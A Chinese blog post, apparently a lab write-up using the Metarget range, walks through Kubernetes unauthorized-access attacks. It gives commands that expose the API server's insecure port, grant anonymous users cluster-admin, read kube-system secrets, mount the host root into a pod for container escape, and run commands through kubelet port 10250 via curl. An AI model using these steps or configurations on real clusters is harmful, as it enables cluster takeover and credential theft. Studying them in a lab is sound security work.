K8s安全问题

原创 已于 2024-01-04 17:08:33 修改 · 1.6k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#kubernetes #安全 #容器

于 2024-01-04 17:08:06 首次发布
本文讲述了作者在搭建k8s过程中遇到的问题,包括8080端口的未授权访问、6443端口的鉴权设置以及如何创建特权容器以获得宿主机权限。通过调整kube-apiserver配置和使用kubectl工具,解决了这些问题并介绍了如何防范潜在的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在搭建k8s因为种种环境问题后,放弃了以前的方法,这回采用metarget靶场进行演示

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt

安装docker和k8s环境

./metarget gadget install docker --version 18.03.1
./metarget gadget install k8s --version 1.16.5

image.png
image.png

API Server未授权访问

Kubernetes组件的服务及默认端口

组件端口说明
API Server6443基于HTTPS的安全端口
API Server8080不安全的HTTP端口,不建议启用
Kubelet10248用于检查Kubelet健康状态的HTTP端口
Kubelet10250面向API Server提供服务的HTTPS端口
Dashboard8001提供HTTP服务的端口
etcd2379客户端和服务端之间通信的端口
etcd2380不同服务端实例之间通信的端口

8080端口未授权访问

  • 第一个是8080端口的位置,默认情况下,6443端口支持认证和授权服务,但8080端口是没有的,较新版本的Kubernetes中8080默认是不启动的

cat /etc/kubernetes/manifests/kube-apiserver.yaml 查看当前配置

image.png

  • 将–insrcure-port=0修改为–insecure-port=8080,并添加–insecure-bind-address=0.0.0.0,重启服务(systemctl restart kubelet),即可开启8080端口的HTTP服务

image.png

  • 此时还需手动关闭一下防火墙等配置
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -F
iptables-save
  • 修改完成后,即可访问8080端口(云服务器一定要开启全端口,避免后续出现问题)

http://ip:8080
image.png
http://ip:8080/apis
image.png
http://ip:8080/openapi/v2
image.png

6443端口未授权访问

API Server作为中心组件,通常使用kubectl来访问apiserver,也可以通过kubernetes各个语言的client库来访问kube-apiserver同时提供https(默认监听在6443端口)和http API(默认舰艇在127.0.0.1的8080端口)访问
如配置不当的话,将默认监听端口127.0.0.1改为0.0.0.0,或者添加了–enable-skip-login选项,将会导致未授权。
由于鉴权配置不当,将"sstem:anonymous"用户绑定到"cluster-admin"用户组,从而使6443端口允许匿名用户以管理员权限向集群内部下发指令。

  • 正常访问会返回403

image.png

  • 对k8s进行配置
kubectl create clusterrolebinding system:anonymous --clusterrole=cluster-admin --user=system:anonymous

image.png

  • 通过访问API获取pod(这里因为未创建pod,所以页面没什么有价值的信息)
https://ip:6443/api/v1/namespaces/default/pods

image.png

  • 获取token
https://ip:6443/api/v1/namespaces/kube-system/secrets/

image.png

创建特权容器

image.png

GET /api/v1/namespaces/default/pods HTTP/2
Host: ip:6443
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 1176

{
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {
        "annotations": {
            "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test-5555\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test-5555\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"
        },
        "name": "test-5555",
        "namespace": "default"
    },
    "spec": {
        "containers": [
            {
                "image": "nginx:1.14.2",
                "name": "test-5555",
                "volumeMounts": [
                    {
                        "mountPath": "/host",
                        "name": "host"
                    }
                ]
            }
        ],
        "volumes": [
            {
                "hostPath": {
                    "path": "/",
                    "type": "Directory"
                },
                "name": "host"
            }
        ]
    }
}

注:可能因为环境问题,死活创建不成功容器,这块就放弃了,后续如果有师傅能创建成功,可以教下我

通过k8s dashborad,创建特权Pods,获取宿主机权限

安装dashborad

wget https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml
vim recommended.yaml

#在recommended.yaml文件中增加两个选项
- --enable-skip-login
- -- insecure-bind-address=0.0.0.

image.png
kubectl apply -f recommended.yaml
image.png

wget https://gist.githubusercontent.com/tejaswigk/da57d7911284cbf56e7f99af0afd6884/raw/de38da2a7619890a72d643d2bbd94278221e5977/insecure-kubernetes-dashboard.yml
kubectl apply -f insecure-kubernetes-dashboard.yml
kubectl -n kubernetes-dashboard port-forward svc/kubernetes-dashboard  9090:80
或者  上面有问题的话就用下面这个命令
kubectl -n kubernetes-dashboard port-forward svc/kubernetes-dashboard --address 0.0.0.0 9090:80

访问9090端口发现
image.png
使用kubectl -n kubernetes-dashboard port-forward svc/kubernetes-dashboard --address 0.0.0.09090:443,但是没有解决成功。
上网搜到解决方法,需要绑定域名之后访问,但是我没有域名,这块就放弃了,然后把方法给大家写出来,大家可以自行尝试

wget  https://raw.githubusercontent.com/kubernetes/dashboard/v2.4.0/aio/deploy/recommended.yaml
kubectl apply -frecommended.yaml

# 创建dashboard-ingress.yaml文件,用来指向一个域名
vim dashboard-ingress.yaml

# 文件内容
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
  annotations:
    kubernetes.io/ingress.class: "nginx"
    nginx.ingress.kubernetes.io/backend-protocol: HTTPS
    nginx.ingress.kubernetes.io/configuration-snippet: |-
      proxy_ssl_server_name on;
      proxy_ssl_name $host;
spec:
  rules:
  - host:这里写你的域名
    http:
      paths:
      - path: /
        backend:
          serviceName: kubernetes-dashboard
          servicePort: 443

# apply文件
kubectl apply -f dashboard-ingress.yaml

# 新建一个recommend.yaml文件,用来设置管理员并定义角色端口
vim recommend.yaml

# recommend.yaml文件内容
kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  type: NodePort #新增的
  ports:
    - port: 443
      targetPort: 8443
      nodePort: 32000 # 新增的,此端口与NodePort不要写一样
  selector:
    k8s-app: kubernetes-dashboard

# apply文件
kubectl apply -f recommend.yaml

#这时候访问32000就可以成功了(但是需要用域名访问)

这里就大概介绍一下:
大家能登录进去后,创建容器,加入创建的容器目录未/host
之后进入容器,进入到/host目录,通过chroot 进行切换bash,造成容器逃逸,获得宿主机权限

k8s kubelet 10250端口未授权

访问10250端口为404,访问/pods路径提示401 Unauthorized
修改/var/lib/kubelet/config.yaml
image.png
重启:systemctl restart kubelet 然后访问
image.png

执行命令

进入/runningpods/目录,寻找namespace、pod、container三个参数,然后构造链接

curl -XPOST -k "https://43.154.178.98:10250/run/kube-system/etcd-vm-0-6-ubuntu/etcd" -d "cmd=whoami"

kube-system:是namespace参数的值
etcd-vm-0-6-ubuntu:是name的值
etcd:是containers里面name的值

curl -XPOST -k "https://43.154.178.98:10250/run/kube-system/etcd-vm-0-6-ubuntu/etcd" -d “cmd=whoami”
image.png

etcd未授权

未指定–client-cert-auth参数打开证书校验,并且把listen-client-urls监听修改为0.0.0.0那么也就意味着这个端口被暴露在外,如果没有通过安全组防火墙的限制,就会造成危害
修改文件:/etc/kubernetes/manifests/etcd.yaml
image.png
访问2379端口
image.png
此时就是需要利用证书进行访问,然后就是证书泄露

Tmac自留
关注
k8s报错error: You must be logged in to the server (Unauthorized)
小啊宇的博客
12-24 7833
背景:故意修改Kubernetes集群所在服务器节点上的时间使Kubernetes证书过期,重新颁发证书后,使用kubeadm alpha certs check-expiration命令查看证书有效时间,相关证书都已重新颁发。 也可以使用openssl x509 -in /etc/kubernetes/pki/apiserver.crt -noout -text |grep ’ Not ’ 进行查看证书的有效期 但是在Kubernetes集群master节点上执行kubectl命令报如下错误: err.
云上攻防-云原生篇&K8s安全-Kubelet未授权访问、API Server未授权访问
明弟有理想的博客
09-13 2450
随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例:公有云、私有云、混合云、虚拟化集群等。以往渗透路径「外网突破->提权->权限维持->信息收集->横向移动->循环收集信息」,直到获得重要目标系统。但随着业务上云以及虚拟化技术的引入改变了这种格局,也打开了新的入侵路径
K8s下的未授权及利用
wintercc1219的博客
02-04 2800
K8s下的未授权及利用,API Server 8080/6443 未授权访问,漏洞复现,kubelet 10250 端口未授权
云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行(1)
m0_60607895的博客
04-06 1071
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
k8s环境部署dvwa靶机
qq_30467221的博客
09-01 528
说明:如果执行报 connection refused,则需要等待kubectl get all -n ingress-nginx 里的需要running状态才能执行便可。备注: safedog.dvwa.com 根据ingress-dvwa.yaml里面的配置来修改调整。5、登录后,点击create/reset database按钮创建数据库后,自动会返回登录页面。6、使用账号和密码:admin / password再次登录就可以了。2、安装nginx-ingress-controller服务。
云上攻防-云原生篇&K8s安全&实战场景&攻击Pod&污点Taint&横向移动&容器逃逸
SuperherRo的博客
03-08 1287
1、云原生-K8s安全-横向移动-污点Taint 2、云原生-K8s安全-Kubernetes实战场景
云原生靶场kebernetesGoat、Metarget
Love&Share
03-26 2974
在这个场景中,我们看到一个具有额外功能和权限(甚至包含HostPath)的Pod,它允许我们访问宿主机系统并提供节点级配置,这样会带来可以获取整个集群控制权限的危害。Kubernetes Goat 是一款针对 Kubernetes 安全的学习、测试和练习工具,该工具可以给广大研究人员提供一个存在安全缺陷(故意留下漏洞)的集群环境,来帮助广大安全爱好者学习和实践 Kubernetes 安全。服务进行通信,我们可以通过它创建新的容器,并把宿主机的目录挂载到新创建的容器中,这样我们就能访问宿主机的资源了。
从零开始学网安:云原生攻防靶场Metarget安装步骤
weixin_65176861的博客
03-01 1443
Metarget的名称来源于meta-(元)加target(目标,靶机),是一个脆弱基础设施自动化构建框架,主要用于快速、自动化搭建从简单到复杂的脆弱云原生靶机环境。近期接触了云原生这个领域,要学习必然是打靶场来得快点,这里用到的就是绿盟科技推出的metarget。检查卸载老版本docker(这里最好是使用管理员权限进行操作)注意:metarget需要在root模式下运行。这样就算是安装成功啦!
安全k8s未授权漏洞总结
最新发布
未完成的歌~的博客
03-27 1768
全称是 kubernetes,是谷歌在2014年推出的一种开源容器编排系统,后来捐赠给了云原生计算基金会(CNCF)。因将k后面的8个字母进行缩写后,被广泛简称为K8s。随着容器技术的发展,面临着容器数量庞大、难以管理的问题K8s的推出很好的解决了这一问题,并且在容器编排系统中占据领先地位。Kubernetes 的名字来源于希腊语,意为“舵手”或“领航员”,寓意着它在容器编排领域如同舵手一般,引领着容器化应用的运行(docker的logo是一个运输船)。Master:管事的(决策者)
k8s安全学习
A1_3_9_7的博客
12-30 1347
如果我们在创建Pod时,将Node节点的根目录挂载到Pod的某个目录下,由于我们能在Pod内部执行命令,所以我们可以修改挂载到Pod下的Node节点根目录中文件的内容,如果我们写入恶意crontab、web shell、ssh公钥,便可以从Pod逃逸到宿主机Node,获取Node控制权。一个 Node(节点)可以有多个Pod(容器组),kubernetes master 会根据每个 Node(节点)上可用资源的情况,自动调度 Pod(容器组)到最佳的 Node(节点)上。
【第99课】云原生篇&K8s安全&实战场景&攻击Pod&污点Taint&横向移动&容器逃逸
Lucker_YYY的博客
09-03 1770
拿到node节点权限时可以查看其他node主机或者master主机是否支持用Taint污点横向移动。云原生攻防:Docker,Kubernetes(k8s),容器逃逸,CI/CD等。云服务攻防:对象存储,云数据库,弹性计算服务器,VPC&RAM等。云厂商攻防:阿里云,腾讯云,华为云,亚马云,谷歌云,微软云等。一个集群包含三个节点,其中包括一个控制节点和两个工作节点。2、云原生-K8s安全-Kubernetes实战场景。-K8s安全-横向移动-污点Taint。,私有云,混合云,虚拟化集群,云桌面等。
pods is forbidden: User "system:serviceaccount:kube-system:namespace-controller" cannot create resou
jstang的博客
09-11 1万+
Web UI部署参考自 https://blog.csdn.net/weixin_41806245/article/details/89381752 解决方案参考自https://www.cnblogs.com/harlanzhang/p/10045975.html 部署完K8sWeb UI后,在Web上部署Pod、Service、RS、RC等资源报错 报错信息: pods is forbid...
k8s中kubelet接口的认证和授权
weixin_47729423的博客
08-11 1835
访问kubelet接口的认证和授权
修复 K8s SSL/TLS 漏洞(CVE-2016-2183)指南
KubeSphere
02-21 2万+
测试服务器配置主机名IPCPU内存系统盘数据盘用途2440200Ansible 运维控制节点41640200+20041640200+20041640200+2002840200+2002840200+2002840200+200harbor2840200Harbor合计822843202800测试环境涉及软件版本信息2.8.203.3.0v1.24.19.5.17.17.52.5.1。
Kubernetes 集群部署–所遇到的问题
happyzwh的专栏
01-11 4351
          查看dashboard界面 访问以下链接(1.8.3访问 https://masterip:6443/ui 无法访问): https://MasterIP:6443/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ 当然这个链接是怎么来的? [root@ma...
Kubernetes集群中部署dashboard
用心做事
10-16 9552
部署 dashboard 插件下载k8s后的解压缩目录结构:kubernetes/cluster/addons/dashboard使用的文件:$ ls *.yaml dashboard-controller.yaml dashboard-rbac.yaml dashboard-service.yaml 新加了 dashboard-rbac.yaml 文件,定义 dashboard 使用的 Rol
Kubernetes dashboard1.8.0 WebUI安装与配置
Aurora Silent
12-19 3万+
kubernetes-dashboard.yamlapiVersion: v1 kind: ServiceAccount metadata: labels: k8s-app: kubernetes-dashboard addonmanager.kubernetes.io/mode: Reconcile name: kubernetes-dashboard namespac
Kubernetes - 使用kubectl proxy
热门推荐
好记性不如烂笔头
05-18 5万+
在mac本地安装minikube后使用kubectl proxy命令就可以使API server监听在本地的8001端口上:MacBook-Mini:~ topka$ kubectl proxy Starting to serve on 127.0.0.1:8001如果想通过其它主机访问就需要指定监听的地址:MacBook-Mini:~ topka$ kubectl proxy --address=
Kubernetes 没有存储拉取镜像的账号信息的 Secret 导致的错误
06-11 757
最近在做部署工具的时候,将应用(Deployment)发布到集群后,发现Pod启动不起来,使用 kubectl describe pod xxx 发现错误如下: ---- ------ ---- ---- ------- ...
K8S容器安全:架构设计与防护策略
"该文档详述了Kubernetes(K8S)和容器镜像的安全架构设计,强调了在DevSecOps环境中实现安全控制的重要性。文档涵盖了角色基础的访问控制、资源配额、Pod安全策略、日志审计、秘密保护以及各种安全检测工具的使用。" ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值